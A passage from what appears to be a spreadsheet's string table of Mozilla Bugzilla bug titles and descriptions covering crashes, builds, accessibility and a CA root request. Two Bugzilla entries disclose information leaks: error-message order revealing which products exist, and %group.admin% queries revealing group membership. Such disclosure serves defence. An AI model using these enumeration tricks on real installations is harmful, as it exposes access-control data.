Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b) Gecko/20050209
Firefox/1.0+</t>
  </si>
  <si>
    <t>annevk</t>
  </si>
  <si>
    <t>FIREFOX-506104</t>
  </si>
  <si>
    <t>add a memoized getter for PluralForm.jsm inside DownloadUtils.jsm</t>
  </si>
  <si>
    <t>CORE-522414</t>
  </si>
  <si>
    <t>RPC and Sync channels will deadlock easily on Windows</t>
  </si>
  <si>
    <t>Created attachment 406383
Patch v1
Due to the craziness that is the Windows message system we can very easily deadlock when we have native widgets in two processes that are also allowed to synchronously call each other via IPC. The only way around this as far as I know is to spin a mini-event loop during synchronous calls that will only respond to certain Windows messages. Patch attached that fixes everything I think.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-486076</t>
  </si>
  <si>
    <t>make uploadsymbols and MOZ_PKG_PRETTYNAMES=1 don't play nice on Mac</t>
  </si>
  <si>
    <t>In a test release run for 3.5b4:
 make uploadsymbols
  in dir /builds/moz2_slave/macosx_build/build/obj-firefox/ppc (timeout 1200 secs)
with
 MOZ_PKG_PRETTYNAMES=1
 MOZ_PKG_VERSION=3.5b4
yields
 /builds/moz2_slave/macosx_build/build/toolkit/crashreporter/tools/upload_symbols.sh ./dist/Firefox 3.5 Beta 4.crashreporter-symbols.zip
 Transferring symbols... ./dist/Firefox
 ./dist/Firefox: not a regular file
 make: *** [uploadsymbols] Error 1
So it's dying on the spaces in human friendly name for the release.
Earlier 'make buildsymbols' has yielded a dist/Firefox.zip via
  cd ./dist/crashreporter-symbols &amp;&amp; \
          zip -r9D ../Firefox 3.5 Beta 4.crashreporter-symbols.zip .
	zip warning: name not matched: 3.5
	zip warning: name not matched: Beta
	zip warning: name not matched: 4.crashreporter-symbols.zip
Looks like
  http://mxr.mozilla.org/mozilla1.9.1/source/toolkit/mozapps/installer/package-name.mk#127
doesn't work so well for non-app files.</t>
  </si>
  <si>
    <t>BUGZILLA-271360</t>
  </si>
  <si>
    <t>Create an appendix for Troubleshooting</t>
  </si>
  <si>
    <t>Troubleshooting in most every manual I can recall is normally an appendix
item. Section 2.6 needs to be moved into such an appendix and troubleshooting
items that are in other areas (such as the FAQ) should be moved here.</t>
  </si>
  <si>
    <t>TESTING-863893</t>
  </si>
  <si>
    <t>Bump marionette_client version to 0.5.24</t>
  </si>
  <si>
    <t>Bump and release to get some of the recent desktop B2G client fixes out.</t>
  </si>
  <si>
    <t>dave.hunt</t>
  </si>
  <si>
    <t>BUGZILLA-248001</t>
  </si>
  <si>
    <t>Conversion of boolean conditions in SQL statements for better db independence</t>
  </si>
  <si>
    <t>Even though alot have been eliminated a few instances of having boolean
conditions in SQL statements exist. I have created a patch to convert these to
equality tests instead for better database independence. For example:
    SendSQL(
         SELECT DISTINCT  groups.id name description isactive
                    FROM  groups user_group_map
-                  WHERE  user_id = $userid AND NOT isbless
+                  WHERE  user_id = $userid AND isbless = 0
                     AND  user_group_map.group_id = groups.id
-                    AND  isbuggroup
+                    AND  isbuggroup = 1
                ORDER BY  description )
I am also making this report a blocker on the PostgresSQL support bug.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-529207</t>
  </si>
  <si>
    <t>[l10n: mk] updated main.lang file for www.mozilla.com</t>
  </si>
  <si>
    <t>Created attachment 412765
updated main.lang file
Attached the updated main.lang file.
ps.
I've tried to svn commit directly but I got a 403 Forbidden error. Whith whom should I debug this issue firther?</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-151909</t>
  </si>
  <si>
    <t>X-remote does not distinguish between profiles</t>
  </si>
  <si>
    <t>If you use X-remote commands with two or more Mozilla profiles (same user) open
on the same display X-remote cannot distinguish between them and performs
operations on whichever window was used last.
This would help to ensure a proper implementation of bug 122698 and would also
help resolve problems in bug 151863.</t>
  </si>
  <si>
    <t>FIREFOX-993421</t>
  </si>
  <si>
    <t>7.59% CART regression when bug 967110 landed</t>
  </si>
  <si>
    <t>See bug 967110 comment 20:
&gt; http://graphs.mozilla.org/graph.html#tests=[[30913231]]&amp;sel=1396803860000
&gt; 1396976660000&amp;displayrange=7&amp;datatype=running and
&gt; https://groups.google.com/forum/#!topic/mozilla.dev.tree-management/
&gt; ygFhulxhgl8 suggest that this regressed CART by about 7.6% on Win8. :-\
&gt; 
&gt; I've not checked other OSes.
&gt; 
&gt; If I had to guess it'd be about relative-positioning the footer.</t>
  </si>
  <si>
    <t>CALENDAR-259235</t>
  </si>
  <si>
    <t>Sanity-Check Alarms Panel Inputs in Options</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 5.01 Windows NT 5.0)
Build Identifier: Default time Alarm goes off before an event accepts negative integer 
Tools-&gt;Options-&gt;Alarms.Negative value is accepted.
Reproducible: Always
Steps to Reproduce:
1. Click Tools-&gt;Options-&gt;Alarms
2. Double click the Default  time Alarm  goes off before an event  field
3. Enter negative Integer eg - 60
Actual Results:  
1. The field accepts the negative integer
Expected Results:  
1. By default it should take as blank/0 or display an error message</t>
  </si>
  <si>
    <t>anupama</t>
  </si>
  <si>
    <t>SEAMONKEY-209437</t>
  </si>
  <si>
    <t>Latest BeOS build hangs after spawning first window (2003-06-14-08-trunk)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.4b) Gecko/20030506 Mozilla Firebird/0.6
Build Identifier: http://ftp.mozilla.org/pub/mozilla/nightly/2003-06-14-08-trunk/mozilla-i586-pc-beos.zip
The splash screen displays Creating first window but once that window
appears Mozilla hangs.
Reproducible: Always
Steps to Reproduce:
1. Download and extract the latest nightly build
2. Launch Mozilla
Actual Results:  
Mozilla hangs during the creation of the first window
Expected Results:  
It should not hang...</t>
  </si>
  <si>
    <t>CORE-210261</t>
  </si>
  <si>
    <t>setting html{overflow:scroll} 3 times crashes [@ nsViewManager::UpdateView ]</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Go to mozilla.org (or just about any other web site).
2. Use the edit styles bookmarklet (from
http://www.squarefree.com/bookmarklets/webdevel.html).
3. Add html { overflow: scroll }.  (Leave out the closing } if it is not
necesssary in the version of Gecko you're using.)
Result: An extra vertical scrollbar appears.  Good so far.
4. Add a space.
Result: Weird stuff happens. For example a scrollbar appears at the left of the
page or the arrow on the top of a vertical scrollbar suddenly points left.  At
this point Firebird is more or less doomed to crash.
Expected: adding a space to the end of a stylesheet shouldn't change anything.
5. Add another space.
Result: Firebird crashes (talkback ids: TB21249929X with 05/22 TB21250048H with
06/21) or enters a state where closing all windows does not exit.</t>
  </si>
  <si>
    <t>CORE-581066</t>
  </si>
  <si>
    <t>Android debug builds crash when content loaded</t>
  </si>
  <si>
    <t>Unfortunately I haven't been able to get a stack yet but if I load fennec I can view the about:home page fine. Loading a content url crashes the browser immediately.</t>
  </si>
  <si>
    <t>TESTING-487494</t>
  </si>
  <si>
    <t>xpcshell-tests: pipe output through stack fixer script</t>
  </si>
  <si>
    <t>Better crash stacks would be nice and they shouldn't be too hard to set up given runxpcshellmumblemumble.py.</t>
  </si>
  <si>
    <t>cmanchester</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-459097</t>
  </si>
  <si>
    <t>Add Chris Atlee to release@mozilla.com</t>
  </si>
  <si>
    <t>Can you please add:
Chris AtLee (started today)
Aki Sasaki (starting 03nov)</t>
  </si>
  <si>
    <t>CORE-307394</t>
  </si>
  <si>
    <t>[FIX]FindNextSibling and FindPreviousSibling are misused when insertion points are involved</t>
  </si>
  <si>
    <t>There's a comment at one of the callers reflecting the problem but I think I
saw it in the debugger a few days ago relating to the other caller
(NeedSpecialFrameReframe) I think while debugging
http://xulplanet.com/testcases/example-viewer.xul plus bug 306663's bookmarklet.
 NeedSpecialFrameReframe itself fwiw is completely incomprehensible and I'm
curious to know what it's supposed to be doing.
In any case when XBL is involved nsCSSFrameConstructor::FindPreviousSibling
and nsCSSFrameConstructor::FindNextSibling can do a |seek| on a ChildIterator
where the index has no relationship to the child list that the seek is being
done in -- basically whenever the ChildIterator has a non-null mNodes.  We need
to figure out what the correct behavior is here.</t>
  </si>
  <si>
    <t>CORE-493266</t>
  </si>
  <si>
    <t>Optimize setting currentTarget</t>
  </si>
  <si>
    <t>Created attachment 377716
patch
Event doesn't need to have currentTarget when there are no listener for it.
So setting currentTarget can be moved from 
nsEventTargetChainItem::HandleEvent to nsEventListenerManager::HandleEvent.
This does show up in a shark profile.
Will ask review after some testing.</t>
  </si>
  <si>
    <t>CALENDAR-329985</t>
  </si>
  <si>
    <t>alarms on recurring items don't really work</t>
  </si>
  <si>
    <t>Double click an open an even from agenda pane for any event that has alarm set to go off say 30 min before event. The event detail does not show this alarm info though calendar event shows it. Weird since I would imagine both to be pulling the info from same store.</t>
  </si>
  <si>
    <t>nidheesh</t>
  </si>
  <si>
    <t>CORE-259617</t>
  </si>
  <si>
    <t>scroll preference code on nsIScrollableView is unused</t>
  </si>
  <si>
    <t>The scroll preference stuff on nsIScrollableView is effectively unused and
unimplemented.  It should be removed unless there's some reason it should stay.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-497372</t>
  </si>
  <si>
    <t>Stage mozillaservice.org Update to config</t>
  </si>
  <si>
    <t>I've pulled the omniture tracking code into the environment config file. Please update stage
web/application/config/environment.php
Add the line:
$config['omniture'] = 'mozillaserviceorgdev'</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-246761</t>
  </si>
  <si>
    <t>update.mozilla.org - Better alt text required</t>
  </si>
  <si>
    <t>update.mozilla.org could do with some better alt attributes on images. Try
browsing with images off and you'll see what I mean.
See this page as a random example with some suggestions:
http://update.mozilla.org/extensions/showlist.php?type=&amp;application=firefox&amp;os=Windows&amp;category=Top%20Rated&amp;numpg=5&amp;pageid=3
Top Left corner - Mozilla Update Logo
Should say Mozilla Update
Top right corner - firefox Corner Logo
Should say Firefox or whatever the section is called (or alternatively just
use alt=).
The Stars - Star
Grey/empty stars should have alt= and red/filled stars should have alt=*
currently with images off it looks like every extension has 5 stars. The word
Star repeated multiple times makes it hard to count the number of stars I think
using an * would be better.
Compatibility Icon - Firefox Icon
This should be alt= since the information it provides is already available in
text form next to the image.
Homepage Icon - Homepage
ditto alt=
Install Icon - Install
ditto alt=
Other than that great job.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-253582</t>
  </si>
  <si>
    <t>cfodirect.com - Warning: The stylesheet http://cfodirect.com/cfopublic.nsf/cfodirect.css was loaded as CSS even though its MIME type image/jpeg is not text/css</t>
  </si>
  <si>
    <t>Warning: The stylesheet http://cfodirect.com/cfopublic.nsf/cfodirect.css was
loaded as CSS even though its MIME type image/jpeg is not text/css.
Source File: http://cfodirect.com/cfopublic.nsf/aDocView?OpenAgent
Line: 0</t>
  </si>
  <si>
    <t>BUGZILLA-283085</t>
  </si>
  <si>
    <t>post_bug.cgi can be used to know which products do not exist and which ones are not accessible</t>
  </si>
  <si>
    <t>In post_bug.cgi we have the following sequence:
my $product = $::FORM{'product'}
my $product_id = get_product_id($product)
if (!$product_id) {
    ThrowUserError(invalid_product_name
                   { product =&gt; $product })
}
and later:
if (!CanEnterProduct($product)) {
    ThrowUserError(entry_access_denied {product =&gt; $product})
}
This can be used by a user to know which products exist and which ones are not
accessible. As per bug 153461 comment 18 about describecomponents.cgi this
information should not be given.
Then the correct fix is the same as the one applied in enter_bug.cgi:
my $product = $::FORM{'product'}
if (!CanEnterProduct($product)) {
    ThrowUserError(entry_access_denied {product =&gt; $product})
}
my $product_id = get_product_id($product)</t>
  </si>
  <si>
    <t>NSS-519550</t>
  </si>
  <si>
    <t>Allow the specification of an alternate library for SQLite</t>
  </si>
  <si>
    <t>We'd like to rename sqlite3 to mozsqlite3 to prevent naming issues that are coming up on OS X.
I'm willing to write the patch but I'll need some help as to where exactly to start.  I'm not great with make and the NSS build system is different from mozilla-central (which I am more familiar with).</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-119746</t>
  </si>
  <si>
    <t>Should be able to set charset for each channel</t>
  </si>
  <si>
    <t>/charset updates client.charset and it's applied for 
all channel.
But if current channel A is in Japanese and channel B is
in Chinese /charset should be applied only for channel A.
I think two commands are neccessary. For global(default) setting
and for channel setting.
Original report in Bugzilla-jp:
http://bugzilla.mozilla.gr.jp/show_bug.cgi?id=1695</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-473605</t>
  </si>
  <si>
    <t>Forgotten password process</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 Ubiquity/0.1.4
Build Identifier: 
The user needs a way to retrieve or change their password if they forgot theirs.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>THUNDERBIRD-493719</t>
  </si>
  <si>
    <t>The inline Edit Contact dialog shows a vertical line</t>
  </si>
  <si>
    <t>In latest nightly win32 Thunderbird builds the inline Edit Contact dialog still shows a vertical line in the background. This line is intended to differ the left icons from text in normal menus. But here we have an inline dialog poping up when the yellow star icon is clicked.
The screenshots from Linux / OS X in Bug 450724 don't show this line. So it's maybe only a Windows skin problem.</t>
  </si>
  <si>
    <t>CORE-202037</t>
  </si>
  <si>
    <t>switching useCSS and executing commands issue mixing html tags and css is broken</t>
  </si>
  <si>
    <t>Hard to summarize:
Set useCSS to false then select some text in midas and set it to bold.  This
creates foo.  Switch back to css mode then italisize it. This creates 
foo
Now bold it again this removes the  tags.  It also removes the italic css
inline declaration.
Not a huge issue since switching css/markup is probably not going to happen
other than during initialization.</t>
  </si>
  <si>
    <t>CORE-858783</t>
  </si>
  <si>
    <t>All asm.js tests currently fail when passing --no-asmjs to the shell</t>
  </si>
  <si>
    <t>I think the tests probably need to check with the shell whether asm.js is enabled before asserting that asm.js compilation succeeded.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-370121</t>
  </si>
  <si>
    <t>Clicking on red/yellow warning text in certificate panel causes text to change to black</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.2pre) Gecko/20070210 Camino/1.1a2+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.2pre) Gecko/20070210 Camino/1.1a2+
When visiting a site that has an invalid or untrusted SSL/TLS certificate a warning panel is presented containing the certificate details and the error which occurred while validating that certificate. Normally this error is displayed in red text. However if a user clicks on that text it changes to black for no apparent reason.
Reproducible: Always
Steps to Reproduce:
1. Visit a site that uses HTTPS has an invalid or self-signed SSL certificate.
2. When the certificate warning panel appears click on the red or yellow error text.
Actual Results:  
The warning text changes to black.
Expected Results:  
The warning text should remain the same color.</t>
  </si>
  <si>
    <t>trevor</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-485280</t>
  </si>
  <si>
    <t>Need more buffer size of arm-wince tools.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 ja rv:1.8.0.4) Gecko/20060508 Firefox/3.0
Build Identifier: 
I don't think Fennec for Windows Mobile without jemalloc is usable but access violation is a problem.
Reproducible: Always</t>
  </si>
  <si>
    <t>hikezoe.birchill</t>
  </si>
  <si>
    <t>CORE-335030</t>
  </si>
  <si>
    <t>CSS :hover property not obeyed by background images</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20060421 Camino/1.0+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20060421 Camino/1.0+
A link that utilizes an image and text (the image being a background image done through CSS) will only trigger the :hover behavior when mousing over the text and not over the image.  This behavior only started after the 4/18 trunk builds in both Firefox and Camino.
Reproducible: Always
Steps to Reproduce:
1. Make sure you have a trunk build from 4/18/06 and on
2. Go to the test page
3. Mouse over the text and see the correct behavior then mouse over the image and see that there is no :hover behavior
Actual Results:  
Nothing
Expected Results:  
Hovering over the image should activate the :hover behavior: changing the color of the text and moving the image to another position.</t>
  </si>
  <si>
    <t>david.vanscott</t>
  </si>
  <si>
    <t>CORE-459729</t>
  </si>
  <si>
    <t>CreateTruncatedCocoaLabel function in MenuHelpersX not available in 64-bit</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.8.1.16) Gecko/20080716 Firefox/2.0.0.16
Build Identifier: 
MenuHelpersX::CreateTruncatedCocoaLabel (in widget/src/cocoa/nsMenuX.mm) will truncate the label text of menus and menuitems if they are above a certain length. They do this via the TruncateThemeText carbon call (deprecated as of OS X 10.5). Apart from being deprecated it appears that this call is unnecessary.
In a xulrunner build I have locally -- the actual app has some menu items with fairly long names especially in some locales -- I've commented out the call to ::TruncateThemeText and cranked the resolution down to see what happens. It seems that Cocoa is smart enough to shorten menuitem labels and menu labels automatically -- via an ellipsis at the end of the label or mid-label -- if working with a screen resolution too small to fit everything in appropriately. No explicit calls to ::TruncateThemeText are necessary and in fact for me they're harmful.
So it seems like CreateTruncatedCocoaLabel could be eliminated and calls made to it replaced with a call that converts the nsString label to an NSString* directly. I don't know enough about upstream dev practices to suggest a patch myself though.
Thanks!
Reproducible: Always
Steps to Reproduce:
Create an application menu or menuitem with an unusually long label (&gt; 300 pixels required to render)
Actual Results:  
The label is abbreviated with an ellipsis mid-label or at the end of the label invariably
Expected Results:  
The label should be abbreviated with an ellipsis only if necessary per screen resolution and menu geometry
My build machine is running OS 10.4. Whoever looks at this bug should probably confirm the behavior is the same in OS 10.5.</t>
  </si>
  <si>
    <t>hiller.moz</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-468682</t>
  </si>
  <si>
    <t>Connection to sm-chat01 times out</t>
  </si>
  <si>
    <t>My SSH connections to sm-chat01 on mpt-vpn are timing out.  I need to access this server to test live chat csat for bug 458713.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-127813</t>
  </si>
  <si>
    <t>comdirect.de - Direct Brokerage No!! Connection for Mozilla Only Netscape after 4x and IE</t>
  </si>
  <si>
    <t>https://brokerage.comdirect.de/de/general/main_fehler_client.html
See Report in German
---schnipp---
ie benutzen einen Browser mit dem die Nutzung des Direct Brokerage der
comdirect nicht mÃ¶glich ist.
Um unser Direct Brokerage nutzen zu kÃ¶nnen benÃ¶tigen Sie einen Microsoft
Internet Explorer ab Version 4.0 oder einen Netscape Communicator ab Version
4.5. AuÃŸerdem ist die Nutzung des Netscape 6 ab Version 6.1 mÃ¶glich.
Beta-Versionen der o.g. Browser sind nicht zugelassen.
Im Augenblick benutzen Sie Mozilla/5.0 Galeon/1.1.3 (X11 Linux i586 U)
Gecko/20020205 als Web-Browser
Sollten Sie weiterhin Probleme mit dem Zugriff per Internet haben wenden Sie
sich bitte in der Zeit von 8:00 bis 22:00 Uhr an unsere Hotline unter der
Rufnummer 01803-336440.
Vielen Dank.
comdirect
---/schnipp</t>
  </si>
  <si>
    <t>CORE-445951</t>
  </si>
  <si>
    <t>missing keyword 'public' in xpcom/glue/nsAutoLock.h</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.8.1.16) Gecko/20080702 SeaMonkey/1.1.11
Build Identifier: cvs tag FIREFOX_3_0_1_RELEASE
in the declaration
class nsAutoUnlock : nsAutoUnlockBase {}
the VACPP 6  compiler correctly assumes 'private' for the ommitted keyword.
An explicit 'public' is needed.
Reproducible: Always
Steps to Reproduce:
1. Compile on AIX 5 with VACPP6
2.
3.
Actual Results:  
build breaks
Expected Results:  
compile without severe warnings
Suggest trivial patch:
Index: mozilla/xpcom/glue/nsAutoLock.h
===================================================================
RCS file: /cvsroot/mozilla/xpcom/glue/nsAutoLock.hv
retrieving revision 1.2
diff -u -8 -p -r1.2 nsAutoLock.h
--- mozilla/xpcom/glue/nsAutoLock.h     16 Aug 2007 20:51:50 -0000      1.2
+++ mozilla/xpcom/glue/nsAutoLock.h     18 Jul 2008 07:20:48 -0000
@@ -24517 +24517 @@ public:
      void unlock() {
         PR_ASSERT(mLocked)
         PR_Unlock(mLock)
         mLocked = PR_FALSE
         Hide()
     }
 }
-class nsAutoUnlock : nsAutoUnlockBase
+class nsAutoUnlock : public nsAutoUnlockBase
 {
 private:
     PRLock *mLock
 public:
     nsAutoUnlock(PRLock *lock) :
         nsAutoUnlockBase(lock)
         mLock(lock)</t>
  </si>
  <si>
    <t>ul.mcamafia</t>
  </si>
  <si>
    <t>CORE-321831</t>
  </si>
  <si>
    <t>Bad arguments to addEventListener cause: Error: uncaught exception: null</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051229 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051229 Firefox/1.6a1
A variety of different forms of incorrect argument will cause addEventListener
to report Error: uncaught exception: null. This is especially annoying
because it doesn't report a line number.
See testcase for examples.
Reproducible: Always</t>
  </si>
  <si>
    <t>thermworm</t>
  </si>
  <si>
    <t>CORE-108424</t>
  </si>
  <si>
    <t xml:space="preserve">[BTN] sizes differently from </t>
  </si>
  <si>
    <t>Currently (as a result of the fix for bug 96630)  always
sizes in quirks mode.  This was introduced for IE compatibility apparently. 
There are a few issues here:
1)  The sizing of  was not changed.  It's not compatible with IE6/Win
2)  The sizing of both types of controls is not compatible with IE5/Mac
3)  Quirks sizing is broken and causes bug 79927.  We should attempt to not
    inflict this on pages unless we have good reason to.
4)  Bug 96630 does not clearly explain how the sizing was incorrect.  Do the
    same arguments not apply to  ?
5)  The current sizing algorithm leads to results that are plain ugly for
    buttons with long value text.
I feel that we should reconsider the decision made in bug 96630 or at the very
least be consistent and apply it to  as well.</t>
  </si>
  <si>
    <t>CORE-373364</t>
  </si>
  <si>
    <t>impelment IA2::role</t>
  </si>
  <si>
    <t>Created attachment 258004
patch
I have questions about role mapping from gecko to IA2.
1) nsIAccessible::ROLE_CLIENT
ATK: ATK_ROLE_PANEL (A generic container that is often used to group objects).
MSAA - USE_ROLE_STRING.
IA2 - ?
2) nsIAccessible::ROLE_ACCEL_LABEL
ATK: ATK_ROLE_ACCEL_LABEL (A label which represents an accelerator)
MSAA: ROLE_SYSTEM_STATICTEXT
IA2: ROLE_SYSTEM_STATICTEXT or IA2_ROLE_LABEL (An object used to present an icon or short string in an interface) ?
3) nsIAccessible::ROLE_CANVAS
ATK: ATK_ROLE_CANVAS (An object that can be drawn into and is used to trap events)
MSAA: USE_ROLE_STRING
IA2: ?
Aaron suggested:
 1) add IA2_ROLE_CANVAS to IA2 idl and comment similar to what ATK says for it
 2) Remove old incompatible comments about canvas role from ia2 idl
 3) Support nsIAccessible::ROLE_CANVAS for  and map that to ROLE_SYSTEM_GRAPHIC for MSAA
4) nsIAccessible::ROLE_HTML_CONTAINER
ATK: ATK_ROLE_HTML_CONTAINER (A document container for HTML whose children represent the document content)
MSAA: USE_ROLE_STRING
IA2: ?
5) nsIAccessible::ROLE_PASSWORD_TEXT
ATK: ATK_ROLE_PASSWORD_TEXT (A text object uses for passwords or other places where the text content is not shown visibly to the user)
MSAA: ROLE_SYSTEM_TEXT
IA2: ?
6) nsIAccessible::ROLE_TERMINAL
ATK: ATK_ROLE_TERMINAL (An object that represents an accessible terminal)
MSAA: USE_ROLE_STRING
IA2: ?
7) nsIAccessible::ROLE_TEXT_CONTAINER
ATK: ATK_ROLE_TEXT (An object that presents text to the user)
MSAA: USE_ROLE_STRING
IA2: IA2_ROLE_TEXT_FRAME (Collection of objects that constitute a logical text entity.) ?
8) nsIAccessible::ROLE_ENTRY
ATK: ATK_ROLE_ENTRY (The object is a component whose textual content may be entered or modified by the user provided ATK_STATE_EDITABLE is present.)
MSAA: ROLE_SYSTEM_TEXT
IA2: ROLE_SYSTEM_TEXT ?
9) nsIAccessible::ROLE_PARENT_MENUITEM
ATK: ATK_ROLE_MENU (An object usually found inside a menu bar that contains a list of actions the user can choose from)
MSAA: ROLE_SYSTEM_MENUITEM
IA2: ROLE_SYSTEM_MENUITEM ?
10) nsIAccessible::ROLE_TEAR_OFF_MENU_ITEM
ATK: ATK_ROLE_TEAR_OFF_MENU_ITEM (A menu item used to tear off and reattach its menu)
MSAA: ROLE_SYSTEM_MENUITEM
IA2: ROLE_SYSTEM_MENUITEM ?
Also I found that some IA2 roles are not mapped to gecko roles. These are:
/// Embeded (OLE) object.
IA2_ROLE_EMBEDDED_OBJECT
/// Text that is used as an endnote (footnote at the end of a chapter or section).
IA2_ROLE_ENDNOTE
/// Text that is used as a footnote.  Also refer to ::IA2_ROLE_ENDNOTE.
IA2_ROLE_FOOTNOTE
/** An image map object.  Usually a graphic with multiple hotspots where 
   each hotspot can be activated resulting in the loading of another document
   or section of a document.
  */
IA2_ROLE_IMAGE_MAP
/** An internal frame. A frame-like object that is clipped by a desktop pane.  
   The desktop pane internal frame and desktop icon objects are often used to 
   create multiple document interfaces within an application.
   Also refer to ::IA2_ROLE_DESKTOP_ICON ::IA2_ROLE_DESKTOP_PANE and ::IA2_ROLE_FRAME
  */
IA2_ROLE_INTERNAL_FRAME
/// An embedded note which is not visible until activated.
IA2_ROLE_NOTE
/// Object with graphical representation used to represent content on draw pages.
IA2_ROLE_SHAPE
Do we support them in gecko?</t>
  </si>
  <si>
    <t>BUGZILLA-417048</t>
  </si>
  <si>
    <t>[SECURITY] Boolean charts let me query for users being in any given group</t>
  </si>
  <si>
    <t>ReportedBy is equals to %group.admin% returns all bugs where the reporter is in the admin group despite I'm not in the admin group and despite I cannot access editusers.cgi (as I cannot bless anybody). AFAIK such data should be restricted to power users who can access editusers.cgi. Moreover query.cgi throws an error if I type a group name which doesn't exist so I can use this trick to guess existing groups.
IMO query.cgi should only let you enter group names you belong to nothing more. Talking about this with dveditz and justdave on IRC they both think it's not a problem on b.m.o because they don't matter if people know who is in which group but it may matter for some other installations which is why I restricting this bug to the security group.
The %group.foo% group substitution feature has been implemented in Bugzilla 2.20 in bug 244239 so this problem exists for a long time.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-153456</t>
  </si>
  <si>
    <t>RealizePalette causes performance problems</t>
  </si>
  <si>
    <t>The RealizePalette call in nsRenderingContextWin::CopyOffScreenBits is expensive
and it does not seem to be necessary. It causes performance issues for some
Gecko based applications running in 8-bit display mode.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-443062</t>
  </si>
  <si>
    <t>suspect splunk instance on buildbot master caused talos outage</t>
  </si>
  <si>
    <t>Somewhere around 15:39 PDT talos machines lost connection to the buildbot master and went red.  The error was:
remoteFailed: [Failure instance: Traceback (failure with no frames): twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion.
]
Machines:
qm-pxp-trunk02/03
qm-pvista-trunk03
qm-mini-ubuntu01/03/04/05
qm-mini-pmac01/04
qm-mini-xp01/02/03/04/05
Machines immediately reconnected after losing connectivity.  This is _not considered a blocker as they are already back connected and waiting for builds to test.</t>
  </si>
  <si>
    <t>NSS-448794</t>
  </si>
  <si>
    <t>Add Chunghwa Telecom eCA root certificate</t>
  </si>
  <si>
    <t>[Note: I received this request via email some time ago and forgot to enter a bug for it my apologies.]
CA Name: ePKI Root Certification Authority eCA
Website: http://epki.com.tw/
One Paragraph Summary of CA including the following:
  - General nature (e.g. commercial government academic/research
    nonprofit)
  - Primary geographical area(s) served
  - Number and type of subordinate CAs
Operating in accordance with the High Assurance Level defined in the Certificate Policy(CP) of Chunghwa Telecom ecommerce Public Key Infrastructure (ePKI) ePKI Root Certification Authority (eCA) is the trust anchor of ePKI. Acting as the interface between certification authority (CA) within and without ePKI eCA is responsible for carrying out cross-certification: issuing and managing the certificates of Level 1 subordinate CAs' within ePKI as well as the certificates of CAs from without.
The eCA is responsible for the processing of firsthand certificate applications and revocations. There is no need to set up a Registration Authority (RA) of eCA. The eCA accepts the applications from the subject CAs and authenticates them.
The eCA is a commercial CA. It is located in Taipei Taiwan. The disaster recovery site of the eCA is located in Taichung Taiwan. eCA has two subordinate CAs : CHTCA and Public CA. The CHTCA is the internal CA of Chunhwa telecom(CHT) which signs certificates for CHT employees. The Public CA signs certificates for CHT clients. 
Audit Type (WebTrust ETSI etc.): WebTrust for CA
Auditor: SunRise CPAsâ€™ Firm a member firm of DFK international.
Auditor Website: http://www.dfk.com/
Audit Document URL(s): https://cert.webtrust.org/ViewSeal?id=695
 Certificate Details
 -------------------
 (To be completed once for each certificate)
 Certificate Name: ePKI Root Certification Authority
 Summary Paragraph including the following:
  - End entity certificate issuance policy i.e. what you plan to do with
    the root
       The eCA signs subordinate CAs only. The CPS of the eCA is available at the URL : http://epki.com.tw/download/eCA_CPS_english.pdf
   Certificate HTTP URL (on CA website): http://epki.com.tw/download/ROOTeCA.cer
 Version: X.509v3
 SHA1 Fingerprint: 67 65 0d f1 7e 8e 7e 5b 82 40 a4 f4 56 4b cf e2 3d 69 c6 f0
 MD5 Fingerprint: Not available. The eCA implements SHA1.
 Modulus Length (a.k.a. key length): RSA(4096 bits)
 Valid From (YYYY-MM-DD): 2004-12-20
 Valid To (YYYY-MM-DD): 2004-12-20
 CRL HTTP URL: http://epki.com.tw/repository/CRL/CA.crl
 OCSP URL: Not available. The eCA is an offline CA. Only CARL of the eCA available.
 Class (domain-validated identity/organisationally-validated or EV):
 Certificate Policy URL: http://epki.com.tw/download/ePKI_CP_V1_chinese.pdf
 CPS URL: http://epki.com.tw/download/eCA_CPS_english.pdf
